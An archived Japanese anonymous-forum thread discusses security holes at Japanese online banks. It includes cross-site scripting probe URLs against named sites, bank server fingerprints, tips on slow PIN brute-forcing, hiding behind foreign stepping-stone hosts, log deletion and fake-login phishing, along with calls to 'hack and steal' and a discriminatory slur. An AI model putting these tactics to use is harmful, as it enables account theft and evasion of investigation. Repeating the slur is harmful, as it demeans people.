くださいますよう、お願い申し上げます。


このメールに対する返信は受付できませんので、ご不明な点等がございましたら、
下記までお問い合わせください。

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊
　　　　　臨時ログイン画面閉鎖のお知らせとお詫び　　　　　ＵＳＯ銀行
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

1月15日、合併直後にアクセスが集中し、ＵＳＯ銀行ホームページにつながりにくい
状況が発生いたしました。やむを得ず、旧東毎銀行関連システム開発会社のサイトに
臨時ログイン画面を設置し、負荷の分散化を図ってまいりましたが、このたび臨時ロ
グイン画面を閉鎖いたしました。

15日にご案内したメールで、臨時ログイン画面を当面利用するようお願いいたしまし
たが、ご案内するログイン画面がどこの組織が所有するサーバのものであるか、また
その確認方法の説明をすることもなく、お客様の大切な暗証番号の入力を安易に促し
てしまったことは、セキュリティの観点で軽率な行為だったと深く反省しております。

今後、当行から、usobank.co.jp 以外のサイトへログインを促すようなご案内するこ
とは一切ございません。そのような案内のメールがお客様に届いた場合、それは当行
以外の何者かが送信した偽のメールである可能性がありますので、ご注意ください。

ご利用のお客さまには、Yahoo!ニュースなどで大変なご心配をおかけいたしましたが、
このたびの失態については、責任者の処分と今後の対策を検討しており、後日処分内
容と対策内容をホームページに掲示いたしますので、これをごらん頂き、ＵＳＯ銀行
をご信頼賜りますよう、お願い申し上げます。

このメールに対する返信は受付できませんので、ご不明な点等がございましたら、
下記までお問い合わせください。

>>254-255
>>232

>>259
それが本当だよな。良くできてる（笑）

バガボンドサーバにクロスサイトスクリプトホール！
https://www.netsecurity.ne.jp/../<script>alert('age')</script>

Bad Request

Your browser sent a request that this server could not understand.

Invalid URI in request GET /../ HTTP/1.0
------------------------------------------------------------
Apache/1.3.11 Server at www.netsecurity.ne.jp Port 443

古！

んのさ、USO銀行のインターネットバンキングゥって
Operaでログオンしようとすると URL欄にパスワードが平文表示されちゃうんだよね。
会社で昼休みに残高確認しようとしてログオン待ってた時に気づいてヒヤリとしたよ。
でもたぶんこれもUSOがっていうより　ANSER-WEBの方が問題なのかな。

正直、セキュリティー温いよ。特にAA(共同行型)は。
惨羽倒潰だったけどAAも関わった身としては。

>>1の東和銀行のは暗証番号間違えロックが3回で設定されている模様。
暗証番号間違えロックは1日で戻る。

ヒントあげちゃおう。

>>78
遅漏レスでｽﾏｿ

デジタル処理っつーかiモードセンターと直でデジタル専用線でホストまで直結だと思われ。
つかそれがiモード/Ezweb/J-Skyの場合お約束事項

>>265　それは夜倍だろ。

>>265
口座ごとに毎日３回かい？
PASS固定で口座をサーチすれば回数制限されなかったりしてｗ
＃まさかね〜

>>268
禿げしくｶﾞｲｼｭﾂ >>18>>22

>>263
今やってみたが、そうはならないようだが。直ったのか？

[memo:2688] How Netscape-Enterprise server vulnerable to
cross-site scripting attack
Netscape Enterprise 4.0 の cross-site scripting 脆弱性の詳細。
http://memo.st.ryukoku.ac.jp/archive/200201.month/2688.html

>>262
雪印食品にも（ｗ
http://www.snowfoods.co.jp/../<script>alert('sagi')</script>

Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../ HTTP/1.1

--------------------------------------------------------------------------------
Apache/1.3.6 Server at www.snowfoods.co.jp Port 80

ufjbank-ssl
工事中
https://csupport.ufjbank.co.jp

>>273　ﾜﾗﾀ

>>1-274
白痴ですか？部落民ですか？（嘲笑）

まず不思議なのは
「他人を貶めることでしかｱｲﾃﾞﾝﾃｨﾃｨを保つことができない」
という自身の恥を人前で晒しても、平気な人が居ることです。
本当に可哀相な人なのです。彼はどうしたら救われるのでしょうか。

金融システムだぞ？
いくら設計がショボくても当然ログ取りはしてるだろ。
つ〜かリアルタイム監視ぐらいはしてるハズ。
被害が小さければ信用無くすのが怖くて
警察沙汰にせずもみ消すってことも考えられるが
奴等は死に物狂いで追跡するハズ。
自分トコで調査する力量がなけりゃ外注するってことも考えられるし。
まぁヤル時は気をつけな。

うーん。怖いな。

既出だが、DoSによるサービス妨害とかできそうだし、
金融ではないが現実にDoSのせいで営業停止になったISPもあるしな。
http://www.zdnet.co.jp/enterprise/0201/23/02012310.html

それに銀行だからセキュリティが甘いわけではないと思うが、
対策がリリースされるまでにタイムラグがある分のリスクが無視できない
のが現実(CERTとBUGTRAQを比較してみればわかるはず)と考えると
サーバクラックされる危険性もあると思うし。
クラックなんかだとここにいる人々はできなくても「誰か一人の凄腕」が
やってしまえばそれで終りという気もするしな。

ログに関して言えば、とっていても無駄だろう。
アホでなければ、サイバー犯罪に関する条約(?)締結国をさけて
北朝鮮の幼稚園とか(あるのかどうかは知らない)セキュリティ
ゆるいところを踏み台にして、踏み台側のログを削除してしまえば
それ以上の追跡は困難だろう。
それに日本にいる人がアタックするとは限らないと思うし。
あほな国の奴等が遊び半分でアタックする可能性もあると思うし。

ブルートフォースが目立つかどうかはやり方次第でしょう。
週一回サイクルで口座番号の異なるものに対し一回ずつアタック、
それを数年繰りかえすなど、工夫は幾らでもできそうな気がする。
暗唱番号を毎週かえたりする人はあまりいないでしょうし。
多少時間がかかってもクリア可能だと思う。

悪用に関していえば、低額の人でも架空口座みたいに犯罪に
使われる危険性はあると思う。

犯罪のリスクとリターンについていえば、
ネットの方がリスクは低いと言わざるを得ないと思う。
中間経路のログなどが消せてしまう分。

個人的には、犯人が日本人よりも外人だった方がやだな。
犯人が見付かったとして、そいつが罪になるのかどうか
わからんし。無視されたらむかつく(w。
日本人なら不正アクセスとかは違法だから文句いえるけどさ。

自分で犯罪を冒そうとは思わないが、被害をうける可能性は
ネット系の方が高そうでいやだ。UFJとかに入っている金は他行に
移そうかな。

>>277
金融のWWWなら最低でも各種ログとtripwireぐらいはしかけてるよ。
平均と最大はムフフ・・・

たしかに対策は害虫メインで、
銀行マンが３交代でその害虫に、
「対策オッケーですか？まだですか？どのくらいまで進みましたか？」
つーて２４時間圧力かけてやらせてるはず。

>>282
まぁ、入る方もログ消したりするわけだからいたちごっこだな。
侵入者もjailやtripwireなんかは知っているのが普通だし。

ただ、金融は一度入られて速攻金引き落とされたら
負けだから、分が悪い(一回のミスが許されない)。
あとでログ解析しても、途中経路でログが終っていれば、
文句言う相手もなく、まさに後の祭。
# 対金融は時間が勝負な気がする。

対策なんかもそもそもベンダーがパッチリリースするまで
結構時間があるよ。適用する以前の話として。

侵入者にのんびり常駐されるようなら終ってるけどな。

age

もはや、セキュリティの問題じゃないような・・・・

　ＵＦＪ銀行は28日、24日に公表した口座振替自動引き落としシステムの
トラブルで、預金の二重引き落としが約18万件、
預金引き落とし漏れが約5000件に達したと発表した。



　　口座振替引落し結果データ還元につきましては、システム管理不具合を精査し、
正常な運用状況になる目処は、２月中旬の見込みです。
なお、口座振替自動引落し処理に関しましては、システム運営・管理部門の
抜本的な体制強化 を通じ、万全を期してまいります。

ちゃんと調べてから発表してくれよ。って感じだ。

ＮＨＫでいま放送されていたよ。

ほんとにエクセルで口座振替データを伝送したのか？

http://www.ufjbank.co.jp/ippan/news/0128.html

フリーダイヤル 0120-189-308
[受付時間] 9：00〜21：00

　ＵＦＪ銀行は28日、24日に公表した口座振替自動引き落としシステムの
トラブルで、預金の二重引き落としが約18万件（引き落とし額にして57億円）、
預金引き落とし漏れが約5000件に達したと発表した。
法人顧客の公共料金引き落としの際にフロッピーディスクなどを通じて
引き渡している決済データについても、1500社向けに遅れが発生している
という。引き落としミスについては29日取引分から正常に作動するが、
法人向けデータ引き渡しの正常化は2月中旬となる見通しと説明している。
同行では現在200人を動員してシステムのチェックを進めている。


フロッピーって・・・・えっ・・・・
って感じなんですが・・・・

電話で、確認を取りました。

エクセル形式のファイルが入ったＦＤや、紙などの媒体で口振企業への
還元をしているけれども、メール等は一切使っていないとのことでした。

引き落としができていない、などの対応は、照会センターを設置したので
個別に問い合わせしてほしいとのことです。0120-189-308 9：00〜21：00

引き落としに関して、http://money.2ch.net/test/read.cgi/money/1004543498/502
みたいな、実際に振り替えできていない口座を引き落とししてしまうような
事態はないそうなので、よかった。

ZIPの事だろ。

相互リンク。口座振替がトラブルを起こしていることについて詳しく
書かれている。下記スレの494以降です。ガセかと思っていたよ。

◆◆◆ＵＦＪはもうダメなのか？◆◆◆
http://money.2ch.net/test/read.cgi/money/1004543498/l50

とやかく言う立場にはないが、他スレへのリンクはしないほうがいい。
ここで紹介されている事を他板の住人が興味本位でやってしまうと
犯罪行為になる恐れがある。
又、メインではないのでsage進行にしている気遣いもわかってほしい。

>>292
なんの気遣い？

フロッピィはいまでも現役で使われているよ。
ＩＢＭのディスケットも健在。
実績のあるメディアを変えたりはなかなかしない。

>>292　
ここ見たバカが串挿さないで銀行いじると、書いたやつのログとIPを
いちいち調べられて面倒だということ。

>>294
1ヘッダー
2ボディ
8サマリー
9エンド
の全銀協手順だったらフロッピーで十分。

ところで１２のリンク先見たけど
客と銀行の間に入っているNTT-dataって何やってんのかな？

証券取引委員会にチクッたやつがいるみたいだけど、
ログなんか調べられたら捕まちゃうのかナ。
激しくきぼんぬ。

>>296 >>297 ﾜﾗﾀ

アメリカだったら話題にも上らない様なコンピュータの
処理ミス。
日本はこういう事を騒ぎすぎるお陰で、利便性の強化が
出来なくなり、高コスト構造になっている。
下らん事でいきり立つのは厨房の証拠と思うゾ。

だとしたらきっとアメリカが腐ってるんでしょう。

ちょっと質問です先生。ドラマとかでよくある架空口座に銀行の
お金をいどうさせて盗むとかゆうのは可能なのでしょうか？

それと何かのテレビで見たのですが、アメリカのハカーがどっか
の会社のパソコンに潜伏性ウィルスを潜ませて会社の電子マネー
かなんかを盗んだとかゆうのも聞いたんですがありえるんですか？

マイクロソフト本社のある国ですからこんなことでは驚かないのでしょう。

>>301
株板独特の口調だな。安心しろ、もう書き込む人いないから。

マイクロソフトの本社はエジプトにあります。

アメリカでした・・すいません。

どうやって勘違いするかと知りたい

>>306　禿胴（ｗｗ

>>303
株板なんかに行った事ねえよボケッ・・・それと上げてごめんね

>>308
「ちょっと質問です先生」これが株板だと「ちょいと質問です先生」、
このように言う人がいるからそうかと思った。
こっちこそゴメンね。それから上がってないヨ。・・（ﾅﾚｱｲ

age

http://headlines.yahoo.co.jp/hl?a=20020218-00000011-vgb-sci

やけに早いな>>311 (w
で、そのページ、途中で切れてるの?

こっちもオモロイYO!
http://headlines.yahoo.co.jp/hl?a=20020218-00000012-vgb-sci
続きが読みたいヨー

UFJ銀行のサイトでは、お客さまの情報への不正アクセス、紛失、破壊、改ざん、漏えいなどを防止するため、セキュリティを高めるための取組を断続的に実施しています。

＜主なセキュリティ対策＞
1． 伝送路上でのセキュリティ確保
お客さまが入力された情報はＳＳＬ（Secure Sockets Layer）技術により暗号化し、伝送路上でのセキュリティを確保しています
2． 厳重な情報保管
強固なファイアウォール設定により不正アクセスを防止するなど、お預かりした個人情報を厳重に保管するための対策を実施しています
3． コンピューターウイルス対策
使用するコンピューターに対しウイルスチェックプログラムによる検知を徹底するなど、万全の対策を実施しています
4． 本人性および権限の正当性の確認
乱数表やＩＣカードなどの高度な認証技術を使用し、お客さま以外の第三者が不正に個人情報にアクセスすることを防止しています。

＜今後の課題のセキュリティ対策＞
5． サーバーソフトのアップデート
情報漏洩につながる不具合の見つかった古いサーバーを使用しないで、常に最新のサーバーソフトで安全を保つ、これは現在まだ行っていません。今後の課題とさせて頂いていますことをあしからずご了承ください。

>>311
なんだよ一月前の話じゃねーか。昨日のことかとおもたよ。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●UFJ銀行のサーバにセキュリティホールが！
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　去る1月17日、UFJ銀行が使用しているウェブサーバにセキュリティホールが
発見された。これはインターネット掲示板サイト２ちゃんねる内に立てられた
「ここの銀行のセキュリティって甘そう
（ http://pc.2ch.net/test/read.cgi/sec/1007968094/ ）」という掲示板で
の情報に基づき、ネット・セキュリティが検証したものだ。

バカボンぱくり

age

ＵＦＪはマジやばいと思う。先日ＵＦＪダイレクトの申し込みをネット上でしたら、カードの暗証番号の入力を要求されるのだが、そのページにセキュリティがかかってなかった。

某銀行の情報関係のものです……。
お客様のデータの入っているコンピュータ・汎用機の手前には
ファイヤーウォールがあり、画面より随時晒されています。

口振のデータはリールテープ・カートリッジテープか
そのテープからＦＤ・ＭＯ等にコンバートして送ります。
かさばらない為でしょう。これが普通です。

あした UFJ に振り込みするんだけど、ダイジョブ？？

>>321
面白いことが起きたら、
このスレに報告するよーに。

ウゲェー（W

>>320
ファイヤーウォールが何？
そんなので安心してるようなやつが動かしてる銀行は使いたくねーな
どこだか教えてくれよ

早くハッキングしろよ＞１−３２４

あか娘とかのマクロで東和だったら暗証番号取得できそう。

>>325 が良いこと言ったけど、どうなの？ >>324
ただ煽って銀行名を知りたかっただけじゃないの？チキンめ。

っーか、ファイヤーウォールもない鯖や汎用機だったら普通に困るぞ。
それに俺はファイヤーウォールの開発担当ではない。
やれ、といわれた仕事をやるだけだ。

そういや、最近オンラインサインアップ可能なところがちらほらあるけど、
あれってだいじょうぶなんかね？

ソニー銀行　http://moneykit.net/
新生銀行　　http://www.shinsei-style.com/directlogin_j.html
富士銀行　　https://bb.fujibank.co.jp/servlet/fbb?xtr=Emf00000

四月からしがない中小企業で働く事になった、社会人一年生です（藁
さてネットバンク取引が出来る口座を作ろうと思っているのですが、
偶然このカキコを見ている内に、セキュリティの事が気になりはじめ
て仕方有りません。
しかしまだまだ厨房レベルの小生には、難しくて解らない事ばかりです。
それで社会人の先輩でも有る皆様方に、上記の銀行のセキュリティに
関し是非ともご教示頂きたくカキコしました。
教えて君で大変申し訳ないですが、どうかこの辺を簡潔にでも説明頂
けましたら幸いです。

329 は UFJ の工作員

なんか、暗証番号だけでサインアップ即・・・できるとこあるよ〜な気が・・・。
気のせいか？　気のせいだと言ってくれ・・・。

そんな筈は無いでしょう（w

http://www.shinsei-style.com/direct/login_1.html

本当だ！　そんな馬鹿なこと・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・

http://pc.2ch.net/test/read.cgi?bbs=sec&key=1007968094&st=120&to=120&nofirst=true

>>22 アンタ頭いいね。

>>331
あるねぇ。前提として口座を持ってなきゃいけないけど。

多分、モジュラス１０

>>337
スレの主旨が分かっていない厨房がいる模様。

>>331-334 自作自演

ここは銀行関係者のつぶし合いスレですか（ｗ

ねえ　ねえ　>>331-334　の掲示で銀行潰せるの？

詳細きぼ〜ん

2002/03/08(金)
今作ってるソフトウェア
昨日日記に書いたとたん、るう。さんから質問メールが。
「作ってるソフトってスマビリモコン用？」

以前るう。さんに NEC SmartVision 用のリモコンを
格安で買ってきてもらった経緯があるので、
こいつを Windows で使えるようにする
ソフトと思ったらしいです。
作っているのはリモコンと呼べなくはないけど、
SmartVision 用のリモコンではないです。

昨日家に帰ってから調べてみたら、
どうやらそのソフトのデータは
すべてテキストで管理されてました。
これならなんとかできそうです。
残るは Windows のタスクスケジューラの制御部分だけ。
ここさえクリアすれば外出先からメールで
テレビ予約するという構想は実現するでしょう。

Operating System and Web Server for moneykit.net
The site moneykit.net is running Fujitsu-InfoProvider-Pro/3.1 (Solaris) on Solaris.

OS, Web Server and Hosting History for moneykit.net
OS Server Last changed IP address Netblock Owner
Solaris Fujitsu-InfoProvider-Pro/3.1 (Solaris) 9-Dec-2001 61.121.110.137 FUJITSU LIMITED
unknown Fujitsu-InfoProvider-Pro/3.1 (Solaris) 6-Dec-2001 61.121.110.137 FUJITSU LIMITED
Solaris Fujitsu-InfoProvider-Pro/3.1 (Solaris) 11-Jun-2001 61.121.110.137 FUJITSU LIMITED
Linux Stronghold/2.4.2 Apache/1.3.6 C2NetEU/2412 (Unix) ApacheJServ/1.1b3 10-May-2001 206.16.189.3 CERFnet customer - Dana Point Communications


Operating System and Web Server for www.shinsei-style.com
The site www.shinsei-style.com is running Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/3.0.18-i18n-ja-2 on Solaris.

OS, Web Server and Hosting History for www.shinsei-style.com
OS Server Last changed IP address Netblock Owner
Solaris Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/3.0.18-i18n-ja-2 5-Jun-2001 202.212.10.57 Alphanet Inc.


Site name or availability problem for bb.fujibank.co.jp
We could not get any results for your selected site.
We cannot tell you anything about this server, and have ignored it.

>>343
仕様の問題に気づいたような気がする・・・。

これって、ネットバンク使っていないユーザーについて、>>1方式で勝手に
サインアップして資金移動し放題と,そのように見えますが？

セキュリティ以前の問題だろ・・・。

ほんとＦはダメだな…

誰か早く金融庁にチクッてやれよ。
早く手を打たないと大変なことになるぞ。

これか、経済板に予言されていた書き込みってのは。

http://money.2ch.net/test/read.cgi/eco/1014432193/157-199

S行だよね。問題になってるの。
ここで昔東和銀行が残高ブルートフォースで覗けるってみんな騒いでた
けど、今回は他に振り出せるんでしょ？　手数料0円で。
ここにカキコしてるような連中は被害うけないかも知れないけど、
パソコンなんて触ったこともないなんて利用者はどうするんだろうね。

sage

残高なんて口座番号だけで教えてくれるんだよ、ヴァカだな。
漏れも通帳記入がめんどうなときに、視点に電話して、
口座番号教えるだけで、残高教えてくれるよ。

ただ暗証番号漏出（チェック）には書かせないページですね。

ねぇ、>>351ってマジに頭悪い？
残高だけじゃないって書いてあるけど？

　　　　　　 　 　　　　 ┏　　　　　　┓ kichigai
　　　　　　　 　　>>351　 　 ∧＿∧　／￣￣￣￣
　　　　 　 　 　 　 ￣￣＼ （　´∀｀）
　　　　　　　　　　　　　　　（　　　　） 　 hikikomori
　　　　　　　　　　　　　　　｜ ｜　|　／￣￣￣￣￣
　　　　　　　　　　　　　　　（_＿）＿）
　　　　　　　　　　　　　┗　　　　　　┛

┏━━━━━━━━━━━━━━━━┓
┃解析結果　　　　　　　　　　　　　　　　 　 ┃
┣━━━━━━━┳━━━━━━━━┫
┃電波受信率　 　 ┃099% 　　 　 　 　 　 ┃
┣━━━━━━━╋━━━━━━━━┫
┃粘着度　 　 　 　 ┃100%　 　 　 　 　 　 ┃
┣━━━━━━━╋━━━━━━━━┫
┃厨房度　 　 　 　 ┃100% 　 　 　 　 　 　┃
┣━━━━━━━╋━━━━━━━━┫
┃妄想度　 　 　 　 ┃100%　 　 　 　 　 　 ┃
┗━━━━━━━┻━━━━━━━━┛

　　　　　　　　　　　　　　　 ＿＿＿＿
　　　　　　　　　　　　　　／　　　　　＼
　　　　　　　　　　　　　/　 　 ,人　　　 ｜　　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　　　　　／　　ノﾉ''ヽ ＼　 　 `　　＜　私と同じく壁をすり抜けるのだ
　　　　　　　　　　 　/　　ﾉ −"　ー　） 　 │　　　＼＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　　　　 ／￣　　　＼μし,.μξ;　　ヽ―`＼
　　　　　　　　／　　　│　　 ＼＝　／　　　│　　 ＼
　　　 　　　, ﾉ　　　　　＼　　　'〜´　　　 /　　　　｜
　　　　　　｜　　　　　　　ヽ　　　　　　／　　　　　｜
　　　　　／　　　　Ｙ　　　　＼　　　 ／　　　　Y 　　 ＼
　　　　／　　　　　｜　　　　　｜　／　　　　　｜　　　　＼､
　　　 ﾉ　　　　　　/　　　 　 　 !/　　　　　　　＼　　　　　ヽ
　　　,!　　　　　 ｜　　　　　　　　　　　　　　　　＼ 　　 　 !､
　　 │　　　　　／　　　　　　　　　　　 　　　 　　　｜　 　　`!､
　　／"γ＼　＿/ ξ⌒―‐'￣＼､　　　 　　　 　 ,／￣＼　＼＿＿ ､ ,ﾉ⌒⌒＼
　μｕｕＵLヽ＿＿――――──￣￣￣｀――´＼､ﾉ　　　"＼＿―'ヽιﾉ Ｕｕｕヽ
/　　　　　　　　　　　　　　　　　　　　　　 ＼　　　,＿＿Ξβ　　　　　＼
!　　　　　　　　　　　　　　　　　　　　＿＿,―'~―￣　　　　　　　　　　｜
｜　　　　　　　　　　　　　　　　　　／　　　　　　　　　　　　　　　　 /
　＼　　　　　　　　　　　　,＿＿､,／　　　　　　　　　　　　　　 　　　／
　　｀ ＿＿., ―――''￣￣￣￣　　　"￣￣￣￣￣`―――――――.､＿＿＿＿／

　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）
（　　　（　　　（　　　（　　　（　　　（　　　（　　　（　　　（　　　（
　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）

　　（　　　（　　　（　　　（　　　（　　　（　　　（　　　（　　　（
　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）　　　）

　　　　　,.,.,.,.,.,.,.,.,.,.,.,.,.
　　　 ,,川川川川川|ll､
　　　川｜川　／Ｚ＼|
　　‖｜‖　 ---　 --|
　　川川‖　　,,,,,,,ｺ,,,,　l　　
　　川川　　| ∴）д（∴）
　　川川　　　　川川川　　
　　川川＼＿川川川川　　
　川川川//川川川川|||　　

尊師さまはね、周りを高い壁に囲まれても自由に行き来して、君達に
会える事が出来るんだよ。

資金横領の疑いで捕まった
知り合いが居たよ・・マジで洒落になってない


内部から協力してもらうと尚更・・（ｗ

おいおい、新生銀行って、振込のとき、第二暗証が要らないの？
http://www.shinsei-style.com/direct/furi_4.html

マジカヨー

>>357
正規の預金者より先回りしてハカがサインアップしたら何でもできる。

インドも米国も、ITについていけない人間はどうでもいいんだろうな。

　　　　　　　　　　　セキュリティホール　ゑ~ぢゃなゐか！
　+　　 　 　 ＼＼　　　大穴システム　ゑ~ぢゃなゐか！ 　　 ／／　　　　　　　＋
　　　+　　　+　　＼＼　 　取り付け騒ぎ　ゑ~ぢゃなゐか ！／+
　　　　　　　　　　　　　　　　　　　+　　　　　　+　　　　　　+ 　　　　　　　　　+　　　　　＋
　　+ 　　*　　　 ｱﾋｬﾋｬﾋｬﾋｬ　+　　　　　　ｱﾋｬ　　　　　　ｱﾋｬﾋｬﾋｬﾋｬﾋｬ
　　　　 　 ／■＼　 　 　 　 ／■＼ 　 　／■＼ 　 ／■＼ +　*　∩/■＼　　　　　+
　　　　　 （　ﾟ∀ﾟ ） 　 *　　（,　 ﾟ∀ﾟ ）∩（ ﾟ∀ﾟ ∩） （,,　 ﾟ∀ﾟ ） 　 　 ヾ( ﾟДﾟ)
　　 + （( （ つ 　~つ )）　（( （つ 　 　~ノ （つ　　丿　（つ　　つ　)） 　 /　　 ⊃　)）　+
　+　　　　乂　　((⌒) )）　+　ヽ　(⌒ﾉ 　,（　ヽノ 　 　 ）　）　）　　 　０＿　〈
　　　 +　　（＿_）￣　　　　　 （＿）Ｕ　　し（＿）　 　 （＿）＿）　　　　　　`Ｊ　　　+　　　*

セキュリティホール祭はこちら

http://money.2ch.net/test/read.cgi/money/1003054290/

勝ち組（自力）東京三菱銀行　三菱信託銀行
勝ち組（他力）新生銀行、あおぞら銀行
引分け　三井住友銀行　富士銀行、第一勧業銀行、日本興業銀行 UFJ銀行
負け組　あさひ銀行、大和銀行、中央三井信託銀行、安田信託銀行、
　　　　UFJ信託銀行 住友信託銀行

>>362
金融板に逝け

セキュ板荒らすな新生工作員！

>>343
The site www.shinsei-style.com is running Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/3.0.18-i18n-ja-2 on Solaris.

PHP/3.0.18 ... やばいんでないの？
http://www.zdnet.co.jp/news/0203/05/b_0304_03.html
PHP Groupのメンバーがこの脆弱性に関する詳細情報をWebに掲載したのは，2月27日のこと。
それによると，この脆弱性を利用すると，バージョン3.0.10〜4.1.1のPHPを走らせているWeb
サーバを乗っ取ることができ，それによってそのサーバがホスティングしているWebサイトを
書き換えたり，サーバに対してシステムコマンドを実行することが可能だという。

みんなで徹底的に新生銀行の穴探しして公表して改善を求めよう。

>>365
php-3.0.18-i18n-ja-3 以降は修正されてるので念のため。
こいつがやばいのには変わりないけど。

あのサインアップの仕組みは消防以下
まともなエンジニアのすることではない
システム監査能力無しと見たね

作ったのはこの人？
http://www.intel.co.jp/jp/eBusiness/it/case/shinsei1.htm

新生銀行、PHPどこで使ってるの？使ってないように見えるが。

Apache/1.3.12 Ben-SSL/1.40 (Unix) PHP/3.0.18-i18n-ja-2 on Solaris
これって、どこかのホスティングじゃないの？
ホスティング屋って、古いApacheのままメンテしてないところ多いからな。
2ch.net もしかり。

http://money.2ch.net/test/read.cgi/money/1014560693/1-2
この話もすげーな。
銀行から電話で誕生日聞かれた経験のある一般人は、次に、
銀行を名乗るところから暗証番号聞かれたら素直に答えるだろうな。
http://pc.2ch.net/test/read.cgi/sec/1007968094/258-261n
といい、すげーな。

>>369
瑕疵担保特約があるからいいかげんでもいいのでせう。

瑕疵担保、こんな情けない話で通用するんですかね？

【新生銀行】誰でも使える便利なネットバンク【ｾｷｭﾘﾃｨｰﾎｰﾙ】
http://choco.2ch.net/test/read.cgi/news/1015735316/

シャレにならんな。振込時に第二暗証がないというのは致命的だよ。なぜって、
ニセウィンドウ出してパスワード盗む攻撃やられたら、いっかんの終わりだ。
これは電子情報学会が去年指摘していた話だ。
新生銀行を装ったスパームをばらまいて、ニセのログインウィンドウを出したら、
騙されてログインする人きっといるよ。
あげくに、右クリックしても、いつもどおり「右クリックは使用出来ません。」
と出るのでＵＲＬ調べられないし。

ハックして銀行のお金を盗め！！

>>376
なにか勘違いしてないか？
そう言うバカが出る前に騒いで被害を最小限にするのがこういう場所の
役割だろうが。

>>377
皆そんな事まで本気で考えてレスしてんのか？（ｗ

>>375
第二暗証など作っても問題は変わらないのだが・・・。

>>375
＞これは電子情報学会が去年指摘していた話だ。
どこの学会だ、それ？（藁　信学会のこと？

ところで、クロスサイトスクリプティングの問題は、
どこの銀行も解決したのかなぁ？？？

>>379
第一暗証抜いて、本来の画面にリレーさせるのは比較的楽だよね。
第二暗証まで抜こうと思ったらダミー画面を何枚も作り込まないと
いけない。しかもログイン後の画面には、残高とかの情報が表示
されるから、その数値次第ではダミーであることが露見する場合も
考えられる。
あと、第二暗証は乱数表を利用する場合が多いので、抜いても
その数値が利用できるわけでもない。
基本的には第一暗証は利便性を取り、第二暗証は安全性を取る。
そういった思想で設計されている物と思われ。

>>380
クロスサイトスクリプティングから発生する問題で実効性のある
システム破りを行うには、それなりの技術がいる。仕様ミスで
開いたセキュリティホールの場合、極論言ってしまえば小学生でも
システム破りが可能。

危険性のレーティングを誤るとえらいことになる。

結局、東和にしろUFJにしろ新生にしろ、晒しageるのが一番マシな
選択だと思う。

http://markets.nikkei.co.jp/news/tech/techCh.cfm?id=eimi192909&date=20020309&ref=1
コレってネットセキュリティ的にどうですか？

ネットワークは素人なんでよくわかんないんですが、
日経は「インターネット技術を使った通信網」と書いてますが
＝ＴＣＰ/ＩＰで基幹ネットワークを構築
で合ってますか？
とすると、でっかい穴が開く予感。。。

解説きぼん

>>384
それはインターネット用に開発された安い機器を使うってことで
実際のインターネットとは繋がっていないシステムのことだよ

何で個人がそんなにセキュリティを気にしなければならないのか理解できない．
盗めばそれは犯罪である．調べれば分かるのならばセキュリティなんて完璧でなくてよい．
君らの家の扉は天才鍵師にもあけられないような鍵をかけているのか．

壊れた鍵を付けておいて、「うちの会社の鍵は立派です！」とのたまう
行為のどこが問題でないというのだろうか？

工作員ﾊｹｰﾝか？(藁

>>385
ネットワーク素人ですがそれぐらいはわかってます。
銀行システムはこれまでクローズドネットワークを構築してきたからある程度安心でした。
ＴＣＰ/ＩＰベースで繋がると云う事は、どこか一つ穴が開いたらこれまでより格段に
基幹(勘定系)システムへ侵入が容易になる(リスク高まる)かと思っての質問です。

>>388
汎用機へのＧ／Ｗは、あたかも汎用機のキーボードを叩いているかのような
Ｇ／Ｗです。

http://itpro.nikkeibp.co.jp/free/NC/NEWS/20010601/1/

おそらくこの件は、Scanのような新進気鋭のメディアは報道するでしょう。
しかし、一般紙は報道しない。それはやはり、解決の糸口が見えてないこと、
可能性の問題であって事件はまだ起きていないことが理由なのでしょう。
新生はシステムを止めるわけにもいかない。だから、報道してもそれっきり
になってしまうのが目に見えている。
でも危険を回避する方法があるんです。インターネットでパワーダイレクトに
アクセスして、今すぐパスワードの設定をすることです。
インターネットを使わない預金者たちに、このシステムのリスクが知らされて
いないことが問題なのです。だから、報道は、新生を叩くという書き方でなく、
「今すぐパスワードの設定をしましょう」と、預金者に知らせるという主旨で
記事を書けばいいはず。

その後で、きちんとこんなバカを容認した連中を叩くことは必要だと思うけどね。

46 名前：名無しさん 投稿日：02/03/11 21:53
先日、Yahoo!Cafe日比谷からここ見てました。

新生銀行のPowerFlexってどうですか？
http://money.2ch.net/test/read.cgi/money/1009805183/

このスレを見ようとして、一覧からクリックしたら、突然「ファイルの
ダウンロード」という窓が開きました。他のスレは普通に読めてます。
おかしいと思って、確認君他で、IPを確認すると、しんなまに割り当て
られたIP領域からのアクセスだと。

ネットカフェでこれって、どういうこった？
重たいサイト開けた時のタイムアウトの表示もなんかF/W臭かったし。
をいをい。


47 名前：名無しさん 投稿日：02/03/11 21:58
>>46
じゃ、Yahoo!Cafeの端末は、しんなまのＦ／Ｗの内側にあるってことだぞ！
もしかして、しんなまって、Ｆ／Ｗの内側に外部者入れてるってことだよ。
新たなセキュリティホールだね。
こんな銀行に金預けていいのか、マジで。

ある意味で、すごいネタ。

新生銀行ってどんなシステム監査しているのだろうか？
頭が痛いね。

　　　　　__――￣￣￣ヽ
　　　 ／　　　　　　　　　＼
　　 ノ　　　　　　　　　　　　ヽ
　　 )　　_　　　　　______ 　　 |
　　 |　/ _＼___／　　　 )　 　|
　　 | //　ヽ　ー-、__　/　　 |
　　 | |　/｀ヽ　|^｀ヽ 　< へ　/
